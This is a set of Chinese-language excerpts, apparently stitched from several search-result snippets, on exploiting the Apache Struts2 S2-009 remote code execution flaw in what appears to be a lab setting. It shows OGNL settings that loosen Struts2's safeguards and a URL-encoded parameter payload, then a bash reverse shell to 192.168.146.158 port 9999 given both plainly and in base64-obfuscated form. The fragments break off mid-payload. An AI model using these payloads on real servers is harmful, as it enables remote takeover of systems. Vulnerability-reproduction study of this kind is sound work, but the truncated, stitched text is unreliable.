将denyMethodExecution设置为false,允许执行某些方法 将allowStaticMethodAccess设置为true,允许静态方法的访问,进一步放宽了安全限制 命令执行touch /tmp/ailx10会在/tmp目录下创建一个名为ailx10的空文件 经过URL编码,部分空格转+号处理,执行的命令里面的空格不需要转+号 age=12313&name=%28%23context[%22xwork.Met...
先对S2-009.war进行解压(我用binwalk,其实直接zip就可以),可见源码都在WEB-INF/src目录中,我一般找ajax相关的代码,这些代码一般逻辑比较简单。 找到一个WEB-INF/src/java/org/apache/struts2/showcase/ajax/Example5Action.java: publicclassExample5ActionextendsActionSupport{privatestaticfinal long serialVersionUID...
发现dns有记录,说明存在该漏洞。 既然发现漏洞了,那我们可以开始反弹shell 代码语言:javascript 复制 bash-i>&/dev/tcp/192.168.146.158/99990>&1base加密 bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i} 访问漏洞url并且添加恶意payload进行抓包。 代...
S2-009 远程代码执行漏洞